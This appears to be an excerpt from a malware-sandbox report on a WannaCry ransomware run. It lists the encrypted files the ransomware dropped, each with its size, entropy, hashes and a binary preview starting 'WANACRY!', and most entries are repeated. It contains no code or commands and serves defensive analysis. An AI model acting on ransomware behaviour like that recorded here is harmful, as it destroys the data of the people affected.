                                                                              Preview:WANACRY!........e..,......D..'%.hs..._Gm..y(.....e...n....2.P.B.?.a....<<K......t.D.t.....N."Jt..^.8.......|../C"r.0k..l&/.-..4._.......~{.....Kn.........u..c.....m...Uu.4.'........W..j.l....wgy..nF.8.....r..LF.......DO..o..i...(&..6...a.o.2...nX.c...P...............7Y.....!.F6b.0E......MCU.-x..J6.....dz....nI-.7nc..R...B@..v./......(...U.s...c..[.K...P..B>s.c+.p..^e...*I......Na.)........@5....\8.-......v..m..>.....x#.uc.O].B...O&....`J..n....D.,.<91H.<f.+i..N.B #.W.*.b..|...E_.N@P.K..&ai...;Io.............+D..O$e.....AR0....z..-..G.[+....ci...O...%v.......\P....O.{G.m.]..B.K...sS.....;.U...6.?O..6 yJ....r)U.d}?....Q7..+..Z.Z.'I....b>.@]...#....`...... =...d.G.`m.u.$.n.j..d|+.ek]A-<u.$..4.s..A......1.O..H.....I.^Vi.P.oM.~3..}..?..gd.<%I.T .......5'....7...HV...1.S@ .}..Eb^^rZ, ....L....k.D(q..Bl..p7y... ........@.L.>?..i.....A....&.A.....kvU...._.0..r..;.&7>&........?.... ....8.5.@.HEKd8....2..d....i....-.Z....e...*...p..\O_.a..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1592
                                                                              Entropy (8bit):7.875576184545488
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkgNP2Yd8X155FN9z9mC+W9eDI66uzBU3QLyc:ogNPYJ9z9ZpmU0yc
                                                                              MD5:A75C7A2C0726E034FD45399AD325F697
                                                                              SHA1:E1F6D7E8D611C75FB77759EC44EA0138B3D3A34F
                                                                              SHA-256:A31875EFD794E62DDD47271990D6BF6E09FC81A1479ED757EB1097143FA0490D
                                                                              SHA-512:9EB03D6B9E1AF6576572E5759B64A7354E9264A281CF77BC9590D338BB0DA3BA45F9EDC40C4AE96CAC3B51AACB1A7C6F6907F3D98EE971F65365F5EC2F1C3C61
                                                                              Malicious:false
                                                                              Preview:WANACRY!........e..,......D..'%.hs..._Gm..y(.....e...n....2.P.B.?.a....<<K......t.D.t.....N."Jt..^.8.......|../C"r.0k..l&/.-..4._.......~{.....Kn.........u..c.....m...Uu.4.'........W..j.l....wgy..nF.8.....r..LF.......DO..o..i...(&..6...a.o.2...nX.c...P...............7Y.....!.F6b.0E......MCU.-x..J6.....dz....nI-.7nc..R...B@..v./......(...U.s...c..[.K...P..B>s.c+.p..^e...*I......Na.)........@5....\8.-......v..m..>.....x#.uc.O].B...O&....`J..n....D.,.<91H.<f.+i..N.B #.W.*.b..|...E_.N@P.K..&ai...;Io.............+D..O$e.....AR0....z..-..G.[+....ci...O...%v.......\P....O.{G.m.]..B.K...sS.....;.U...6.?O..6 yJ....r)U.d}?....Q7..+..Z.Z.'I....b>.@]...#....`...... =...d.G.`m.u.$.n.j..d|+.ek]A-<u.$..4.s..A......1.O..H.....I.^Vi.P.oM.~3..}..?..gd.<%I.T .......5'....7...HV...1.S@ .}..Eb^^rZ, ....L....k.D(q..Bl..p7y... ........@.L.>?..i.....A....&.A.....kvU...._.0..r..;.&7>&........?.... ....8.5.@.HEKd8....2..d....i....-.Z....e...*...p..\O_.a..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1800
                                                                              Entropy (8bit):7.879678952381014
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkJ1n6woFhASWw7BZz2e+tNQVV494IY4DItJd:oJR6tSSWw7zz2HNcVGY4UN
                                                                              MD5:830BD99140A4428940C21B07A68A5B78
                                                                              SHA1:E943879307E67503FA2C654A419193C5A4A7548B
                                                                              SHA-256:6237F2C050A24C25BAFB301F4B56647D895AFAF443FB63840315CAEA22B6D5B5
                                                                              SHA-512:03918BDE1359CE34CDE1763E1F0A82C9BC59C08F6EFC84A8587710106F4FD53AB5679EACB44C1DF112C57669D8C2BCB4E3215EA79A8876112ECCB83A2BFB574F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....7a|p`AN.....2A..o\.Hp.B... .I...Im....m...[.0..)...j..(>...W.......b.CnM.;.tc.3....b....:..V.#..|.........S.K)...H.t.!.A.7.].3/..0.%u.76..?.%wIj.....+...~.Z.1^....x.A.......8.D...y.&NwG.B:Cf$WA..G.|.B.Q....S+..h_.u..-4x.y.m.{b,.F.)....B]9..`.:...................k.......kR.5...5fY..sIe....d..:.j+<nA...X....[..6...Fj....W.LW!.C;.C=a.%......Q4..G...`..0..9..l....>.~*.......Z.xI.*..Cx1.k..5$U.a.%\.a..a4N..N..e./..k.@.0...$.X"[9......=Lgu3..$.j.......C..^..f.#.u<A.^..L......|.w[.G.y{...1.|k....g.%C.w.<]O8|.1..H....j.r0...R.v.X*......I..=zBqK#.P..;... ..Z...O.,..e.....|...t..-V....8..^.{r(...G^.W([..d.j..mHkQF%..>.f...?-_t.8..S(..<._....A....N..}Tk...H.....D......T..o......:...v.....N...(.r.dp.1..n].,...+@..$..B..8/Cp...o.y..2..V.....&5.^Cv..V...9..<......)_..t.k..z%.8......2.....fG....{H.-Dy......U.....Ij......m...V....Qh....m..%E/w...+.d7.|...o*.Je..n\.7.h./../..9La..M....V,..sc...~./....i.A.@..LF...0...*.s3...Q..:.^.H..LB.Vs
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1800
                                                                              Entropy (8bit):7.879678952381014
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkJ1n6woFhASWw7BZz2e+tNQVV494IY4DItJd:oJR6tSSWw7zz2HNcVGY4UN
                                                                              MD5:830BD99140A4428940C21B07A68A5B78
                                                                              SHA1:E943879307E67503FA2C654A419193C5A4A7548B
                                                                              SHA-256:6237F2C050A24C25BAFB301F4B56647D895AFAF443FB63840315CAEA22B6D5B5
                                                                              SHA-512:03918BDE1359CE34CDE1763E1F0A82C9BC59C08F6EFC84A8587710106F4FD53AB5679EACB44C1DF112C57669D8C2BCB4E3215EA79A8876112ECCB83A2BFB574F
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....7a|p`AN.....2A..o\.Hp.B... .I...Im....m...[.0..)...j..(>...W.......b.CnM.;.tc.3....b....:..V.#..|.........S.K)...H.t.!.A.7.].3/..0.%u.76..?.%wIj.....+...~.Z.1^....x.A.......8.D...y.&NwG.B:Cf$WA..G.|.B.Q....S+..h_.u..-4x.y.m.{b,.F.)....B]9..`.:...................k.......kR.5...5fY..sIe....d..:.j+<nA...X....[..6...Fj....W.LW!.C;.C=a.%......Q4..G...`..0..9..l....>.~*.......Z.xI.*..Cx1.k..5$U.a.%\.a..a4N..N..e./..k.@.0...$.X"[9......=Lgu3..$.j.......C..^..f.#.u<A.^..L......|.w[.G.y{...1.|k....g.%C.w.<]O8|.1..H....j.r0...R.v.X*......I..=zBqK#.P..;... ..Z...O.,..e.....|...t..-V....8..^.{r(...G^.W([..d.j..mHkQF%..>.f...?-_t.8..S(..<._....A....N..}Tk...H.....D......T..o......:...v.....N...(.r.dp.1..n].,...+@..$..B..8/Cp...o.y..2..V.....&5.^Cv..V...9..<......)_..t.k..z%.8......2.....fG....{H.-Dy......U.....Ij......m...V....Qh....m..%E/w...+.d7.|...o*.Je..n\.7.h./../..9La..M....V,..sc...~./....i.A.@..LF...0...*.s3...Q..:.^.H..LB.Vs
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2296
                                                                              Entropy (8bit):7.90994790650452
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkxlPS21W4Ku2Fm399MkUxItAYqBamnyt1uOYYVg+U69mojU9RKB:oTSjvFm3K0mnzYVfU6QVs
                                                                              MD5:DD23374725E6FB2711F2F4D56B4C0D7D
                                                                              SHA1:9D44CE0F95465373BBD9497C2537DCA4C3CA0445
                                                                              SHA-256:FA26C3BB25744BD36A42BFEC4B773C13995C0FD4A551BE373D8D193A8F0CD7E5
                                                                              SHA-512:F6E0C1C7A45D25A687B3E3478B9F9D06F060A6499AFAA5EA2129A559694656FE8A3F1799581A094E73C176FA526086E070DD76867DC2DB71A32E9377F1CCAFCD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....0..7F..~i....p./5NJ$.eGR..I...[R....=.,.7.WX8..e.JHGx.mII.&%.9r..2.nG....o.XH....M...g(.V:..j.L2.ic9B.h.Y.....2\g>.H....&Z..9....zO.....J..ma..^.4.<Y%.e...F...g.e=..E..4...w....+.%.....&.A~.............:....D'.....E...F0...<...J.....af..3.............t..1!V..r..a;.~U.y..j'=....n.nB....j...(.qI.7...E.5.3.$.5@.;.......N..G.=.&.xMO=......qSk>..t....t.S...J...i.,...u.m.&...e.auj....L.....]v3c..rm.E...1...@@.,.)-....`.=;N>w9z,7...Z....[>i.D.:Z)._q.&.7....._..xd...>?x....n..5..xI^..)..*. .K.vp.......1X.<.L....S....^...D........&$.G......qK}..(...+........f.o4B....Y.}....!..s.....P,.[.<)z6.p......1[=..../.`..zd.Q.f.%...?.Y.NKF.d.....E...>S.#..f.T.....#B/.2...^..I.3'.1Q`..nA.0......U)^...Mq.....)..-.0,.....1.%.}...}([ .....(....X..!.$...8..L.q.0.%..;.1@j>..T`..#;.$.l5'...e..A^.~.z...<.S>...>..q.....h.......i..Jk.>l..&.N..%...c~...@,.....;*6h.>o.3..8.=H.u.;.w..d...k..q!..........{.2..c[C.6.\..E............I.Z.+/'.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2296
                                                                              Entropy (8bit):7.90994790650452
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkxlPS21W4Ku2Fm399MkUxItAYqBamnyt1uOYYVg+U69mojU9RKB:oTSjvFm3K0mnzYVfU6QVs
                                                                              MD5:DD23374725E6FB2711F2F4D56B4C0D7D
                                                                              SHA1:9D44CE0F95465373BBD9497C2537DCA4C3CA0445
                                                                              SHA-256:FA26C3BB25744BD36A42BFEC4B773C13995C0FD4A551BE373D8D193A8F0CD7E5
                                                                              SHA-512:F6E0C1C7A45D25A687B3E3478B9F9D06F060A6499AFAA5EA2129A559694656FE8A3F1799581A094E73C176FA526086E070DD76867DC2DB71A32E9377F1CCAFCD
                                                                              Malicious:false
                                                                              Preview:WANACRY!....0..7F..~i....p./5NJ$.eGR..I...[R....=.,.7.WX8..e.JHGx.mII.&%.9r..2.nG....o.XH....M...g(.V:..j.L2.ic9B.h.Y.....2\g>.H....&Z..9....zO.....J..ma..^.4.<Y%.e...F...g.e=..E..4...w....+.%.....&.A~.............:....D'.....E...F0...<...J.....af..3.............t..1!V..r..a;.~U.y..j'=....n.nB....j...(.qI.7...E.5.3.$.5@.;.......N..G.=.&.xMO=......qSk>..t....t.S...J...i.,...u.m.&...e.auj....L.....]v3c..rm.E...1...@@.,.)-....`.=;N>w9z,7...Z....[>i.D.:Z)._q.&.7....._..xd...>?x....n..5..xI^..)..*. .K.vp.......1X.<.L....S....^...D........&$.G......qK}..(...+........f.o4B....Y.}....!..s.....P,.[.<)z6.p......1[=..../.`..zd.Q.f.%...?.Y.NKF.d.....E...>S.#..f.T.....#B/.2...^..I.3'.1Q`..nA.0......U)^...Mq.....)..-.0,.....1.%.}...}([ .....(....X..!.$...8..L.q.0.%..;.1@j>..T`..#;.$.l5'...e..A^.~.z...<.S>...>..q.....h.......i..Jk.>l..&.N..%...c~...@,.....;*6h.>o.3..8.=H.u.;.w..d...k..q!..........{.2..c[C.6.\..E............I.Z.+/'.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1528
                                                                              Entropy (8bit):7.852823581549365
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkxQNWAyFTx3yiixPIVupp7UO/2ylwFy+peWLOOLZKbGn004MYgY7IASAK9lF2WE:bkxE4GQufUvo+peWL19b0h7IDlCgrkT
                                                                              MD5:DC9D953B6C07BD9158F91D2D77961467
                                                                              SHA1:46CD52CA52894BF8BDE8BC005D7E6CEB1FB5E5BE
                                                                              SHA-256:9783FEA5BDAB5703105AE0CF09190953C0FE3E2D2C0DCF32417D98575C29DA60
                                                                              SHA-512:CE4E32E8CFA07AB77324EB5CEEF9421902309F4E20884C7AC7238CC8713ED704FDA6677C81D0C8B763A8DD4A23657E124CD9200A41A3884EE4ACD83BD556B3EF
                                                                              Malicious:false
                                                                              Preview:WANACRY!......y.........(..!a..Y../hV..\.p.~8i...~.......js....`../j.%........G.!.$..$..K.O......j.Q.8..E....*Q.....w....7*.[.m..._..0*.f.%.@g4......!....c.....^..F.....(..y.....G%...(.....3...<...Q.\...,>.t......`...u.........OC.}.0.0V...@L<..M..F..yP.x................s].*.jwwN.O...R..yS..[/.j....E.^.!.a.}5...,6.......h....CEM.....;l...{.g...(.,..c..&.DY.~...#>..}#........G.M.4.....`Y....D....RJ..k.K0S.R,.....'..yz..T_dB..."..:.i..j.]..e..pr.m..........S...O+......&4&5...s....u.h..B..0....N..j.c.mD@.,f.....d ...@N.c#D........B........[......j'v.uy.H@u..[bxR..........(...ALR..=..V,}....&..KZ.^..f9.....s..|.yGm4.V..H.9..n.Rp.h<....a.(".Z.....{I..e&..~...V.].V.....h.. #.2P....@e.hL#Y...._s...V)..-........M.......Z.k.&...5...U..;#((........t..g8....w!......+.7E,..L...O.J..oX237.# ew^.X..s~A.V..U......p..l.z.....M...e..d...9c.m..jt.v.v?Iw...[D/G...)#0.@...E._.@.9z.V..../....p..Jr,.J....{.AKy0-....-N..*:...W.k.z.....a.Z=...+....K/ym....?w
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1528
                                                                              Entropy (8bit):7.852823581549365
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkxQNWAyFTx3yiixPIVupp7UO/2ylwFy+peWLOOLZKbGn004MYgY7IASAK9lF2WE:bkxE4GQufUvo+peWL19b0h7IDlCgrkT
                                                                              MD5:DC9D953B6C07BD9158F91D2D77961467
                                                                              SHA1:46CD52CA52894BF8BDE8BC005D7E6CEB1FB5E5BE
                                                                              SHA-256:9783FEA5BDAB5703105AE0CF09190953C0FE3E2D2C0DCF32417D98575C29DA60
                                                                              SHA-512:CE4E32E8CFA07AB77324EB5CEEF9421902309F4E20884C7AC7238CC8713ED704FDA6677C81D0C8B763A8DD4A23657E124CD9200A41A3884EE4ACD83BD556B3EF
                                                                              Malicious:false
                                                                              Preview:WANACRY!......y.........(..!a..Y../hV..\.p.~8i...~.......js....`../j.%........G.!.$..$..K.O......j.Q.8..E....*Q.....w....7*.[.m..._..0*.f.%.@g4......!....c.....^..F.....(..y.....G%...(.....3...<...Q.\...,>.t......`...u.........OC.}.0.0V...@L<..M..F..yP.x................s].*.jwwN.O...R..yS..[/.j....E.^.!.a.}5...,6.......h....CEM.....;l...{.g...(.,..c..&.DY.~...#>..}#........G.M.4.....`Y....D....RJ..k.K0S.R,.....'..yz..T_dB..."..:.i..j.]..e..pr.m..........S...O+......&4&5...s....u.h..B..0....N..j.c.mD@.,f.....d ...@N.c#D........B........[......j'v.uy.H@u..[bxR..........(...ALR..=..V,}....&..KZ.^..f9.....s..|.yGm4.V..H.9..n.Rp.h<....a.(".Z.....{I..e&..~...V.].V.....h.. #.2P....@e.hL#Y...._s...V)..-........M.......Z.k.&...5...U..;#((........t..g8....w!......+.7E,..L...O.J..oX237.# ew^.X..s~A.V..U......p..l.z.....M...e..d...9c.m..jt.v.v?Iw...[D/G...)#0.@...E._.@.9z.V..../....p..Jr,.J....{.AKy0-....-N..*:...W.k.z.....a.Z=...+....K/ym....?w
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4856
                                                                              Entropy (8bit):7.963788459692557
                                                                              Encrypted:false
                                                                              SSDEEP:96:oV2ylhjhNqhq8iv3hsTg7lsE0SmEDk2CV3MaX+qLvXU6CQzNylM:4KhqRsClsXSmEQ2Cqa5jDI+
                                                                              MD5:96FBD308899910B6A1CDE8D79912C04E
                                                                              SHA1:F5DD0F92904124A5BC0979ABA622AE24FCA78F19
                                                                              SHA-256:877380541DA2FD3AAF0ECDB11B447B9F108C410BB811A2D22FFF9EB381F194DB
                                                                              SHA-512:19DA3ACC35B1E60E7DDC258A33E13E6F0B8F4E9C3C078ACFA2C6BFD2D845F9FCA0C940918A275767BD6966E0443C0E14B8E906ECE6A64114009AF1AE0C908691
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......-Y)g.o.[..8qZ>.q.Fo.k...j.v[.`. Mu30.P...,7.....gE..%kL.....)..S<.M..y?.D......2dq.!...}.D..e.&.wb.....]~n.x.9....3.`....-..T.z&.+.y]n..$..l."...|O.U....@_bA...V.....e.>.M\..S....L..{.g..&......W..0.>?.B.O_....6#.\....<...!.%s.kc..#..].*......'............C>..B...VR.m...`..fF...O.5j../o....M..q.:y5.O.|!.._.2q.kTO..6..B].^..b.p].\@.V..C...V.'...=.p..|..$fH!...W.....I...><.......x>....m..z+.J....... ......!...TJ..#t..-c....7.N..p..X.v.".ju..........w...k.w....o.P{......0.cJ.9.`.L,..*......o....2P%'.........0.....x[..Z.r...Y+4.v...D..?.+...6..p4\...Y...R..."..Z.8..t.b.L.\gy.F..;9.....\..{.....FV...q.bq...a|.#S.....:X..b$.........p...(4..I.,).....~..(..8...@O.....L.m..N.'.....'..LC.Z..j..q.X~.CO&.....J..-..1...a.f[..U...,..6..DJ...-.........1.O...._......Q.wM+a......K1..9.K..e.9!..A.5.d.XM.3M.\l.xI..?uL.......z.#i.~mzv~..n.u..B?...p.....*......3..).K......'.F.....,d.7d#.@.....>&...E...E6......Y.M.....p.......P.j.Y.*.p.f$q;[...G6..V
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):4856
                                                                              Entropy (8bit):7.963788459692557
                                                                              Encrypted:false
                                                                              SSDEEP:96:oV2ylhjhNqhq8iv3hsTg7lsE0SmEDk2CV3MaX+qLvXU6CQzNylM:4KhqRsClsXSmEQ2Cqa5jDI+
                                                                              MD5:96FBD308899910B6A1CDE8D79912C04E
                                                                              SHA1:F5DD0F92904124A5BC0979ABA622AE24FCA78F19
                                                                              SHA-256:877380541DA2FD3AAF0ECDB11B447B9F108C410BB811A2D22FFF9EB381F194DB
                                                                              SHA-512:19DA3ACC35B1E60E7DDC258A33E13E6F0B8F4E9C3C078ACFA2C6BFD2D845F9FCA0C940918A275767BD6966E0443C0E14B8E906ECE6A64114009AF1AE0C908691
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......-Y)g.o.[..8qZ>.q.Fo.k...j.v[.`. Mu30.P...,7.....gE..%kL.....)..S<.M..y?.D......2dq.!...}.D..e.&.wb.....]~n.x.9....3.`....-..T.z&.+.y]n..$..l."...|O.U....@_bA...V.....e.>.M\..S....L..{.g..&......W..0.>?.B.O_....6#.\....<...!.%s.kc..#..].*......'............C>..B...VR.m...`..fF...O.5j../o....M..q.:y5.O.|!.._.2q.kTO..6..B].^..b.p].\@.V..C...V.'...=.p..|..$fH!...W.....I...><.......x>....m..z+.J....... ......!...TJ..#t..-c....7.N..p..X.v.".ju..........w...k.w....o.P{......0.cJ.9.`.L,..*......o....2P%'.........0.....x[..Z.r...Y+4.v...D..?.+...6..p4\...Y...R..."..Z.8..t.b.L.\gy.F..;9.....\..{.....FV...q.bq...a|.#S.....:X..b$.........p...(4..I.,).....~..(..8...@O.....L.m..N.'.....'..LC.Z..j..q.X~.CO&.....J..-..1...a.f[..U...,..6..DJ...-.........1.O...._......Q.wM+a......K1..9.K..e.9!..A.5.d.XM.3M.\l.xI..?uL.......z.#i.~mzv~..n.u..B?...p.....*......3..).K......'.F.....,d.7d#.@.....>&...E...E6......Y.M.....p.......P.j.Y.*.p.f$q;[...G6..V
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1208
                                                                              Entropy (8bit):7.822838028195445
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkUSlh7zDwmLsIzyl0zSn5ZH69NhESCABDNTzVsFVPcq4ecVk2U91tnXIw64oJ+w:bkUIzDwCs8zSrHkiSC6R/RPkbPpXCmQ1
                                                                              MD5:59FFE22AEE72CC3DC467F4C8555B7A3D
                                                                              SHA1:21C6D959A81BCA559D8AB7B0A8D7E7CC4EC15FA6
                                                                              SHA-256:7EDE21F637A0CDA26536F17F09B346A64907A9B0C209F4620D519075DD7B602E
                                                                              SHA-512:D04B91DCEA2FB0DD5CFD957FFDF0D508A85110709FA4E32AC3D46FB0761F5CDCC5FD63A0AA62E89764F40CFF8D29A1F0BBB09AC8C84A0CC9E0FF7913DAFE4FDA
                                                                              Malicious:false
                                                                              Preview:WANACRY!....&.w.W1...0.u4v...!........_.....X....).b.....#.....6.Q=d.!q.O.w,..I.....J...Q.. ...Xe..=.....n.'..{..C+Q.aG.O.j.....Jk........[.)g.......(.e.o..8(..{s....,..[...g..l...f_g.@.?..$...[......px..[<.Wz.D..-..=.._.vD<.?.j........bafk....x.l-....q.9............[i.L...^y..0..^...z.Z.QBD.l......$.<...].o.t%.].X...*z......Odv...M......%.h.}...yB..q&..k..g%.%W.Y..s..Il~._..X6.j..v-..t"........=... @H...Vq.'...Kr:.@|.[.........E...GR..x.}_...^6JI.K..2..(c...S..d.M.l....D.f...z...Zc)...U.=9.>..&...c..P.xO..{C?.r.....J.@.O...kE.A...n......E..zVa[..1gi..v...\r;{..u'.=.{..Bh..f+r..^...K..o..6.......'.@w:.V.[..f;.j.?R...g.....{..|0`}..$.H.q..]..e..3...}...MQ.-..p..T:...*.)C..t.QcN...]=....g...A.:...b..m.]s;kN....a..p29....c.m.{..K0....x.*.~....Zyo....`..P..0.........2v$.|XE..AK.o..(.<.+}DJ*.Z...R-M}{.^....-[.).\.M..M...>E.....E.~..O.-^x...x..{..</." >.........|....V[u.{v{..........j..1.....a..i..2z.QMO.5.ZZ.'....xU..h..e........#....=:.^w.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1208
                                                                              Entropy (8bit):7.822838028195445
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkUSlh7zDwmLsIzyl0zSn5ZH69NhESCABDNTzVsFVPcq4ecVk2U91tnXIw64oJ+w:bkUIzDwCs8zSrHkiSC6R/RPkbPpXCmQ1
                                                                              MD5:59FFE22AEE72CC3DC467F4C8555B7A3D
                                                                              SHA1:21C6D959A81BCA559D8AB7B0A8D7E7CC4EC15FA6
                                                                              SHA-256:7EDE21F637A0CDA26536F17F09B346A64907A9B0C209F4620D519075DD7B602E
                                                                              SHA-512:D04B91DCEA2FB0DD5CFD957FFDF0D508A85110709FA4E32AC3D46FB0761F5CDCC5FD63A0AA62E89764F40CFF8D29A1F0BBB09AC8C84A0CC9E0FF7913DAFE4FDA
                                                                              Malicious:false
                                                                              Preview:WANACRY!....&.w.W1...0.u4v...!........_.....X....).b.....#.....6.Q=d.!q.O.w,..I.....J...Q.. ...Xe..=.....n.'..{..C+Q.aG.O.j.....Jk........[.)g.......(.e.o..8(..{s....,..[...g..l...f_g.@.?..$...[......px..[<.Wz.D..-..=.._.vD<.?.j........bafk....x.l-....q.9............[i.L...^y..0..^...z.Z.QBD.l......$.<...].o.t%.].X...*z......Odv...M......%.h.}...yB..q&..k..g%.%W.Y..s..Il~._..X6.j..v-..t"........=... @H...Vq.'...Kr:.@|.[.........E...GR..x.}_...^6JI.K..2..(c...S..d.M.l....D.f...z...Zc)...U.=9.>..&...c..P.xO..{C?.r.....J.@.O...kE.A...n......E..zVa[..1gi..v...\r;{..u'.=.{..Bh..f+r..^...K..o..6.......'.@w:.V.[..f;.j.?R...g.....{..|0`}..$.H.q..]..e..3...}...MQ.-..p..T:...*.)C..t.QcN...]=....g...A.:...b..m.]s;kN....a..p29....c.m.{..K0....x.*.~....Zyo....`..P..0.........2v$.|XE..AK.o..(.<.+}DJ*.Z...R-M}{.^....-[.).\.M..M...>E.....E.~..O.-^x...x..{..</." >.........|....V[u.{v{..........j..1.....a..i..2z.QMO.5.ZZ.'....xU..h..e........#....=:.^w.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1368
                                                                              Entropy (8bit):7.828414815972882
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk14Myr5RG6mrPWbXMT6m7MtMZ5DpiNeXk4BMkxsVpnjiFvsUTzWE6IiJgAL55Kr:bk149RJmrebMT6SSMJ7XkUUVBusUTzWU
                                                                              MD5:F5CCBBCC078DA2FE3F555C076741D715
                                                                              SHA1:E3A47418AA453121B95D1F463626DFEB5144D30A
                                                                              SHA-256:4E62472073F17B2FEE7316D976A389C85C4B95F87C095804EE044F5733A0B784
                                                                              SHA-512:E354472A14F650020954B9391033AE67704EEAFD81111C3B638647D1C737D21E7B31511EAE61EF964F9D87723EBC3DF4C8C129A6C03A56EA60F2266D3F98B8A5
                                                                              Malicious:false
                                                                              Preview:WANACRY!....B..`...."....}8i.,.._\^..v..rQ.{.....$.../"$..v.<......Z?...I.s:...d~a.<...U%O\.,...Um....X;.P\........=n.O.G......2...=....n\].o.`s#.....%."..?..YEaA\vZ....E.\/.9..n..o.^.w. .^IgR......Yk.r8........A.>J..Qad......|...Jso...(CD.f...,P`4.y..x#SyX......@.......`.l..s...w.EC........ pN...?X......_..1D<.>.U...T..;o......E.ZC.o..|r...7iB.3}=....%..<. ...Xb.._.l.hRX..X\.ze.3x.>....t..g..[g..N...^].....g....E.m.f....?...Wn5..H.MW...a.'`q.s...[..5c..)....~...<1;y..m...T&P.|s."C.....H....I.Is..M.J........r.o.T*..xM+9..K.l_p......\.a.@If.zI....~...r..R$)h..Tx..|.p.l.*.j...A..q...;.r...MI.&1..,.......q..<...d....Rn..M....Zq*.XC...%....!T.6.........s..jt...L...*...u.......K........g......M...mjm>qno.a...z.......h.h.h..xeP.#. ....`>...^"f_{hX.4W.8^i.(.~..$n;.....T.F?..[Hf.Oy....%.~....<.M....|..(.j..9.c.....N..HxEj.......T..[..hF...}.Vz.f^.?....,F."....:UQ.....S.|u...........G?...P.._FV..f....G..p(-..t..BGG...>^$.7.+...a|k.f.^../..y>j.....*...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1368
                                                                              Entropy (8bit):7.828414815972882
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk14Myr5RG6mrPWbXMT6m7MtMZ5DpiNeXk4BMkxsVpnjiFvsUTzWE6IiJgAL55Kr:bk149RJmrebMT6SSMJ7XkUUVBusUTzWU
                                                                              MD5:F5CCBBCC078DA2FE3F555C076741D715
                                                                              SHA1:E3A47418AA453121B95D1F463626DFEB5144D30A
                                                                              SHA-256:4E62472073F17B2FEE7316D976A389C85C4B95F87C095804EE044F5733A0B784
                                                                              SHA-512:E354472A14F650020954B9391033AE67704EEAFD81111C3B638647D1C737D21E7B31511EAE61EF964F9D87723EBC3DF4C8C129A6C03A56EA60F2266D3F98B8A5
                                                                              Malicious:false
                                                                              Preview:WANACRY!....B..`...."....}8i.,.._\^..v..rQ.{.....$.../"$..v.<......Z?...I.s:...d~a.<...U%O\.,...Um....X;.P\........=n.O.G......2...=....n\].o.`s#.....%."..?..YEaA\vZ....E.\/.9..n..o.^.w. .^IgR......Yk.r8........A.>J..Qad......|...Jso...(CD.f...,P`4.y..x#SyX......@.......`.l..s...w.EC........ pN...?X......_..1D<.>.U...T..;o......E.ZC.o..|r...7iB.3}=....%..<. ...Xb.._.l.hRX..X\.ze.3x.>....t..g..[g..N...^].....g....E.m.f....?...Wn5..H.MW...a.'`q.s...[..5c..)....~...<1;y..m...T&P.|s."C.....H....I.Is..M.J........r.o.T*..xM+9..K.l_p......\.a.@If.zI....~...r..R$)h..Tx..|.p.l.*.j...A..q...;.r...MI.&1..,.......q..<...d....Rn..M....Zq*.XC...%....!T.6.........s..jt...L...*...u.......K........g......M...mjm>qno.a...z.......h.h.h..xeP.#. ....`>...^"f_{hX.4W.8^i.(.~..$n;.....T.F?..[Hf.Oy....%.~....<.M....|..(.j..9.c.....N..HxEj.......T..[..hF...}.Vz.f^.?....,F."....:UQ.....S.|u...........G?...P.._FV..f....G..p(-..t..BGG...>^$.7.+...a|k.f.^../..y>j.....*...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1512
                                                                              Entropy (8bit):7.8572909198356164
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkusPi/IWPiM+FgKTpefH/a34PTQwy+bglMljs5RaiRxs0ukkd4Z3XPW:bkuWig0z2h8Pi3ocdXlkjKRah5HKu
                                                                              MD5:31F82EAD59925948B4E9A794931D82A1
                                                                              SHA1:72F24957CFA33EACCC049ED2C1CDB32FF9D5CC22
                                                                              SHA-256:6AF5D1CE1E56BC44E0E050F5A74518B49810315045A59908B50D5116DCA5A55E
                                                                              SHA-512:5C4E0A5E6C9767C31E93D047500FDA777B7DAD411AF7352814CEF32A13B3C497B3D5209CECBF111E2EE41DE94C212FB23ADC1A6B3D3FD596BB88E8CBC48D5FF7
                                                                              Malicious:false
